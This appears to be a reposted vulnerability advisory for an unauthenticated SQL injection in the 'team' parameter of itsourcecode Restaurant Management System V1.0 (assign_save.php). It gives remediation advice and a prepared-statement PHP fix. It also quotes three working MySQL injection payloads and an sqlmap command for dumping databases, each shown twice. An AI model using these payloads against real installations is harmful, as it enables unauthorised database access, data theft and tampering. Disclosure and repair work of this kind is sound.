Itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL Injection

by ADMIN


Introduction

The itsourcecode Restaurant Management System V1.0 has been found to contain a critical SQL injection vulnerability in the '/admin/assign_save.php?id=111' file. This vulnerability allows attackers to inject malicious SQL queries, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information. In this article, we will delve into the details of this vulnerability, its impact, and provide suggested repairs to ensure system security and protect data integrity.

Affected Product(s)

The affected product is the Restaurant Management System, a PHP-based project available for download on the itsourcecode website.

Vendor Homepage

The vendor's homepage can be found at https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/.

Affected and/or Fixed Version(s)

The affected version is V1.0 of the Restaurant Management System.

Submitter

The submitter of this vulnerability report is 0x0A1lphi.

Vulnerable File

The vulnerable file is /admin/assign_save.php?id=111.

Software Link

The software link for the affected product is https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip.

Problem Type

The problem type is a SQL injection vulnerability.

Root Cause

The root cause of this issue is that the value of the 'team' parameter is taken from the request and used directly in SQL queries without appropriate sanitization or validation. This allows attackers to craft input values that alter the structure of the SQL query and perform unauthorized operations.

Impact

The impact of this SQL injection vulnerability is severe, as attackers can exploit it to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption. This poses a serious threat to system security and business continuity.

Description

During the security review of the Restaurant Management System, a critical SQL injection vulnerability was discovered in the "/admin/assign_save.php?id=111" file. This vulnerability stems from insufficient validation of the user-supplied 'team' parameter, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

This vulnerability can be exploited without requiring any login or authorization, making it a significant security risk.

Vulnerability details and POC

The vulnerability details and proof of concept (POC) are as follows:

  • Vulnerability location: The 'team' parameter is vulnerable to SQL injection attacks.
  • Payload: The following payloads can be used to exploit this vulnerability:
Parameter: team (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: team=1' RLIKE (SELECT (CASE WHEN (2832=2832) THEN 1 ELSE 0x28 END))-- wGbK

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: team=1' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT (ELT(2346=2346,1))),0x71706a7871),2346)-- WACP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: team=1' AND (SELECT 9748 FROM (SELECT(SLEEP(5)))hGuU)-- kVEM

Screenshots of specific information obtained from testing and running with the sqlmap tool

The following screenshots show some specific information obtained from testing and running with the sqlmap tool:

    sqlmap -u "http://10.20.33.25/altonsystem/admin/assign_save.php?id=111" --data="team=1" --dbs

[Screenshot: sqlmap output]

Suggested repair

To repair this vulnerability, the following steps can be taken:

  1. Use prepared statements and parameter binding: Prepared statements prevent SQL injection because they separate the SQL code from user-supplied data. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as SQL code.
  2. Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
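The following is an added example, not code from the itsourcecode project, showing how steps 1 to 3 above would look for the 'team' parameter of assign_save.php. It assumes the table and column names (assignments, team_id, id), a low-privilege database account named rms_app, and that both 'team' and 'id' are integer identifiers; none of these come from the advisory and must be adapted to the real schema.

```php
<?php
// Added example (not the project's own code): a hardened handler for the
// 'team' POST parameter of assign_save.php. Table/column names, the
// rms_app account and the integer type of 'team' and 'id' are assumptions.

declare(strict_types=1);

// Surface database errors as exceptions instead of silently continuing.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Step 3: connect as a low-privilege account (assumed name 'rms_app') that
// holds only the grants this page needs, never 'root' or an admin account.
$db = new mysqli('localhost', 'rms_app', getenv('RMS_DB_PASSWORD') ?: '', 'altonsystem');

// Step 2: validate input before it goes anywhere near SQL. We assume 'team'
// (POST) and 'id' (GET) are positive integers; anything else is rejected.
$team = filter_input(INPUT_POST, 'team', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
$id   = filter_input(INPUT_GET,  'id',   FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($team === false || $team === null || $id === false || $id === null) {
    http_response_code(400);
    exit('Invalid team or id');
}

// Step 1: prepared statement with bound parameters. The query text with its
// placeholders is compiled first; the bound values are sent separately and
// are never parsed as SQL, so quotes or SQL fragments in the input cannot
// change the structure of the statement. (The integer validation above
// already rejects such input, but binding protects string columns too.)
$stmt = $db->prepare('UPDATE assignments SET team_id = ? WHERE id = ?');
$stmt->bind_param('ii', $team, $id);
$stmt->execute();

if ($stmt->affected_rows === 0) {
    http_response_code(404);
    exit('No such assignment');
}
$stmt->close();

header('Location: assign.php');
```

The two layers are deliberately independent: validation rejects anything that is not a plausible identifier, and parameter binding guarantees that whatever does reach the database is treated as a value, so a missed validation case does not become an injection.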

By following these steps, the vulnerability can be remediated, and the system can be made more secure.

itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection Q&A

Q: What is the itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection vulnerability?

A: The itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection vulnerability is a critical security flaw that allows attackers to inject malicious SQL queries, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information.

Q: What is the root cause of this vulnerability?

A: The root cause of this vulnerability is that the value of the 'team' parameter is taken from the request and used directly in SQL queries without appropriate sanitization or validation. This allows attackers to craft input values that alter the structure of the SQL query and perform unauthorized operations.

Q: What is the impact of this vulnerability?

A: The impact of this SQL injection vulnerability is severe, as attackers can exploit it to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption. This poses a serious threat to system security and business continuity.

Q: Is a login or authorization required to exploit this vulnerability?

A: No, a login or authorization is not required to exploit this vulnerability, making it a significant security risk.

Q: What are the vulnerable files and software links?

A: The vulnerable file is /admin/assign_save.php?id=111, and the software link for the affected product is https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip.

Q: What are the suggested repairs for this vulnerability?

A: The suggested repairs for this vulnerability are:

  1. Use prepared statements and parameter binding: Prepared statements prevent SQL injection because they separate the SQL code from user-supplied data. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as SQL code.
  2. Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Q: What are the payload types and payloads for this vulnerability?

A: The payload types and payloads for this vulnerability are:

  • Boolean-based blind: team=1' RLIKE (SELECT (CASE WHEN (2832=2832) THEN 1 ELSE 0x28 END))-- wGbK
  • Error-based: team=1' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT (ELT(2346=2346,1))),0x71706a7871),2346)-- WACP
  • Time-based blind: team=1' AND (SELECT 9748 FROM (SELECT(SLEEP(5)))hGuU)-- kVEM

Q: What are the screenshots of specific information obtained from testing and running with the sqlmap tool?

A: The screenshots show the output of the following sqlmap invocation:

    sqlmap -u "http://10.20.33.25/altonsystem/admin/assign_save.php?id=111" --data="team=1" --dbs

[Screenshot: sqlmap output]

Q: Who is the submitter of this vulnerability report?

A: The submitter of this vulnerability report is 0x0A1lphi.

Q: What is the vendor's homepage?

A: The vendor's homepage is https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/.